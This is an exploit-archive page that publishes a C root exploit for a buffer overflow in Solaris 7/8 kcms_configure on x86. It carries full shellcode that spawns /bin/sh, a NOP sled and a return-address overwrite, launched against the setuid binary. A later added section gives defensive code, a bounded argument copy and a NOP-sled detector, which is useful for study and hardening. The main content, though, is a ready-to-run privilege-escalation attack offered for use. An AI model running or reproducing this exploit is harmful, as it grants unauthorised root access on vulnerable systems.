kcms.c
Posted Aug 20, 2001
Site xfocus.org

Solaris 7/8 kcms_configure command line buffer overflow on both sparc/Intel platforms.

tags | exploit, overflow
systems | solaris
SHA-256 | 060830798eeb4bfc82866e4a2ef7eba72abfa93248e51af9d583026e70c7d476

/*
 * Solaris 7/8 kcms_configure command line buffer overflow on both sparc/Intel platforms
 *
 * root exploit for x86
 *
 * Thanks to the signals handler. It doesn't make life easier, does it?
 *
 * Compile: $gcc -o ex kcms_configure_ex.c
 * Run: $./ex xserver:0.0 [adjustment]
 *
 * Default should work.
 *
 * User should take responsibility to use this code.
 *
 * virtualcat (virtualcat@xfocus.org)
 *
 * http://www.xfocus.org
 *
 * 06-July-2001
 *
 */

#include <stdio.h>
#include <stdlib.h>   /* malloc, atoi, exit */
#include <string.h>   /* strlen, memset */
#include <unistd.h>   /* execl */

#define RET_DIS 1025  /* Displacement to overwrite the return address */
                      /* 1002 is the original magic */
                      /* Believe it or not? - Due to the kcms_configure's */
                      /* signal handling, it ends up with this number ;) */
#define NOP 0x90      /* NOOPs */
#define NNOP 500      /* Number of NOOPs - To make life much easier */

char shellCode[] = /* Solaris x86 shellcode by cheeze wizz */
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

/* Returns the current stack pointer: the value is left in %eax, which is
 * the x86 return register, so no explicit return statement is needed */
int get_esp()
{
    __asm__("mov %esp, %eax");
}

void usage(const char* cmd)
{
    printf("Usage: %s xserver:DISPLAY [adjustment]\n\n", cmd);
    printf(" xserver -> X window server's ip\n");
    printf(" DISPLAY -> X window server's display\n");
    printf(" adjustment -> Default(0) should work, or increase/decrease by 4\n\n");
    printf(" eg. $./xx 192.168.0.88:0.0\n");
    printf(" $./xx 192.168.0.88:0.0 -16\n");
    exit(1);
}

int main(int argc, char **argv)
{
    /* Just to make it easy to understand */
    char* charPtr = NULL;
    char* bufferPtr = NULL;
    int* intPtr = NULL;

    int shellCodeLength = strlen(shellCode);
    int bufferSize = RET_DIS + 4 + NNOP + shellCodeLength + 1;

    int retAddr = 0;
    int adjustment = 0;
    int i;
    int esp = get_esp();

    if(argc >= 3)
    {
        adjustment = atoi(argv[2]);
    }
    else
    {
        if(argc == 1)
        {
            usage(argv[0]);
        }
    }

    retAddr = esp + adjustment;
    bufferPtr = (char *) malloc(bufferSize);

    if(bufferPtr != NULL)
    {
        /* Fill the whole buffer with 'A' */
        memset((char *)bufferPtr, 0x41, bufferSize);

        /* Butt in our return address */
        intPtr = (int *) (bufferPtr + RET_DIS);
        *intPtr++ = retAddr;

        charPtr = (char *) intPtr;

        /* To increase the probability to hit the jackpot */
        for(i=0; i<NNOP; i++)
        {
            *charPtr++ = NOP;
        }

        /* Butt in the shell code */
        for(i=0; i<shellCodeLength; i++)
        {
            *charPtr++ = shellCode[i];
        }

        /* Null terminated - Not necessary but nice to have */
        *charPtr = 0;

        printf("esp=0x%.8x, adjustment=%d, jump to 0x%.8x. Have fun!\n", esp, adjustment, retAddr);

        /* Try to hit the jackpot */
        execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "-d", argv[1], bufferPtr, (char *)NULL);
        printf("Doesn't work! :(\n");
    }
    else
    {
        printf("No more free memory!\n");
    }
    return 0;
}
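The listing above works because kcms_configure copied a command-line argument into a fixed-size stack buffer without checking its length, so an argument of RET_DIS + 4 + NNOP + shellcode bytes overwrites the saved return address and lands in the NOP sled. The following C is an added example, not part of the xfocus exploit or of Sun's kcms_configure source, showing the defender's side of the same pattern: a bounded argument copy that refuses input which does not fit, and a simple heuristic that flags an argument shaped like this payload (overlong, or carrying a long run of 0x90 bytes). DISPLAY_BUF_SIZE and the sled threshold are assumed values for illustration; the sample payload is constructed in the block (filler, four placeholder address bytes, a NOP sled, no shellcode) purely as a test fixture.

```c
/* Added example: bounded argument handling and a NOP-sled check.
 * Not code from the original exploit or from kcms_configure. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DISPLAY_BUF_SIZE 256   /* assumed size of the fixed destination buffer */
#define NOP_BYTE 0x90          /* x86 NOP, the byte the exploit's sled is made of */

/* Safe replacement for an unbounded strcpy(buf, argv[i]) into a fixed buffer.
 * Returns the number of bytes copied, or -1 if the argument (plus its NUL)
 * would not fit. It never writes more than dst_size bytes. */
int copy_arg_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    n = strlen(src);
    if (n >= dst_size)          /* no room for the data and the terminator */
        return -1;
    memcpy(dst, src, n + 1);
    return (int)n;
}

/* Length of the longest run of consecutive NOP bytes in a NUL-terminated
 * argument. A display name such as "host:0.0" never contains any. */
size_t longest_nop_run(const char *arg)
{
    size_t best = 0, cur = 0;
    for (; *arg != '\0'; arg++) {
        if ((unsigned char)*arg == NOP_BYTE) {
            cur++;
            if (cur > best)
                best = cur;
        } else {
            cur = 0;
        }
    }
    return best;
}

/* Defender-side heuristic: 1 if the argument is longer than the buffer it is
 * headed for, or carries a NOP run of at least sled_threshold bytes; else 0. */
int is_suspicious_arg(const char *arg, size_t buf_size, size_t sled_threshold)
{
    if (strlen(arg) >= buf_size)
        return 1;
    if (longest_nop_run(arg) >= sled_threshold)
        return 1;
    return 0;
}

/* Constructed test fixture shaped like the exploit's buffer layout: 'A' filler,
 * four placeholder bytes where an address would sit, then a NOP sled. No
 * shellcode. Returns the payload length, or 0 if out_size is too small. */
size_t build_sample_payload(char *out, size_t out_size, size_t filler, size_t nops)
{
    size_t pos;
    if (filler + 4 + nops + 1 > out_size)
        return 0;
    memset(out, 'A', filler);
    pos = filler;
    memcpy(out + pos, "BBBB", 4);
    pos += 4;
    memset(out + pos, NOP_BYTE, nops);
    pos += nops;
    out[pos] = '\0';
    return pos;
}

int main(void)
{
    char display[DISPLAY_BUF_SIZE];
    char payload[2048];
    size_t len = build_sample_payload(payload, sizeof payload, 1025, 500);

    printf("sample payload: %zu bytes, longest NOP run %zu\n", len, longest_nop_run(payload));
    printf("bounded copy of sample: %d (rejected)\n",
           copy_arg_bounded(display, sizeof display, payload));
    printf("bounded copy of \"localhost:0.0\": %d bytes\n",
           copy_arg_bounded(display, sizeof display, "localhost:0.0"));
    printf("sample suspicious: %d, display name suspicious: %d\n",
           is_suspicious_arg(payload, sizeof display, 64),
           is_suspicious_arg("localhost:0.0", sizeof display, 64));
    return 0;
}
```

The length check in copy_arg_bounded is the fix that removes the overflow; the sled heuristic is only a coarse sanity check for a wrapper or audit tool and will not catch a payload that pads with something other than 0x90.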
© 2024 Packet Storm. All rights reserved.